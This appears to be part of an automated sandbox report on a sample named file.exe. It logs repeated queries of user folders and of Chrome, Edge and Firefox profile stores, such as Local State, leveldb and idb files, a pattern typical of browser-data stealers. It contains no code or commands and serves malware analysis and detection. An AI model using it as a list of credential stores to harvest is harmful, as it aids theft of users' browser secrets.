              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Desktop VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Documents\My Music VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Documents\My Pictures VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Documents VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Videos VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Pictures VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Pictures\Camera Roll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Pictures\Saved Pictures VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-jones VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-jones\jones VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Pictures VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Pictures\Camera Roll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Music VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-jones\jones\Minecraft VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackups VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\events VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\minidumps VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporary VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removed VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
